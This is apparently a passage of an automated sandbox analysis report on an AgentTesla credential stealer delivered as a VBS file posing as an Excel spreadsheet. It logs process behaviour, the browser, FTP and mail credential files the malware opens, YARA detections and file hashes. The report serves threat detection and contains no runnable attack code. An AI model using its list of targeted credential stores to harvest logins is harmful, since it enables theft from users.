Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Queries volume information: C:\Program Files (x86)\Windows Mail\wab.exe VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe

Code function: 17_2_00A13675 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

17_2_00A13675

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: 0000000B.00000002.2697680397.00000000223B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2697680397.00000000223DD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Program Files (x86)\Windows Mail\wab.exe

File opened: C:\FTP Navigator\Ftplist.txt

Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini			Jump to behavior

Yara detected Credential Stealer

Source: Yara match

File source: 0000000B.00000002.2697680397.00000000223B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: 0000000B.00000002.2697680397.00000000223B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2697680397.00000000223DD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Windows Analysis Report
Copy of Poseidon Marine 4th monthly Stores Apr 2024 R3 .xls.vbs

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

ID:	1428797
Product:	CloudBasic
Start time:	16:11:25
Start date:	19.04.2024
Sample:	Copy of Poseidon Marine 4th monthly Stores Apr 2024 R3 .xls.vbs
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	5d3834cac11c37e3bdee72fb190f69c7
SHA1:	ac14ebcd913ea2e2d51a8663127139105a50a810
SHA256:	5c9f85c6b9a542f488ca18de26cbeb294f86b4e31b61bdbf4ae1cff132d5abf9

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506	Microsoft Cabinet archive data, Windows 2000/XP setup, 69993 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression	29F65BA8E88C063813CC50A4EA544E93	05A7040D5C127E68C25D81CC51271FFB8BEF3568	1ED81FA8DFB6999A9FEDC6E779138FFD99568992E22D300ACD181A6D2C8DE184
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506	data	46B248ABB71ED7EEFD7EA2E0C704E607	280B1888B4DD61AFAD4F091E26B7954BEF8A6031	2393700B47082A1B802CE6B119A97210868C0177C65339228509856E3AC85467
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache	data	C7F7A26360E678A83AFAB85054B538EA	B9C885922370EE7573E7C8CF0DDB8D97B7F6F022	C3D527BCA7A1D1A398F5BE0C70237BD69281601DFD7D1ED6D389B2FD8E3BC713
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	data	BC6DB77EB243BF62DC31267706650173	9E42FEFC2E92DE0DB2A2C9911C866320E41B30FF	5B000939E436B6D314E3262887D8DB6E489A0DDF1E10E5D3D80F55AA25C9FC27
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_anwbgalp.amy.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gdopdnuk.xpk.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hcc22og1.cto.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w4ydzkou.ijh.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	PE32 executable (GUI) Intel 80386, for MS Windows	251E51E2FEDCE8BB82763D39D631EF89	677A3566789D4DA5459A1ECD01A297C261A133A2	2682086ACE1970D5573F971669591B731F87D749406927BD7A7A4B58C3C662E9
C:\Users\user\AppData\Roaming\Saltspoonful.Dag	ASCII text, with very long lines (65536), with no line terminators	8D7C0DE10EE4EBB04BA7F300783A5515	E24E4420A3B99F3031357F5638B539C511E570D7	341D57BC35D22B4D579D2325F2E6E03FDA71EAFD2430BF3C381D358AFE34B8FB

Windows Analysis Report Copy of Poseidon Marine 4th monthly Stores Apr 2024 R3 .xls.vbs

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
Copy of Poseidon Marine 4th monthly Stores Apr 2024 R3 .xls.vbs

Malware Threat Intel
Provided by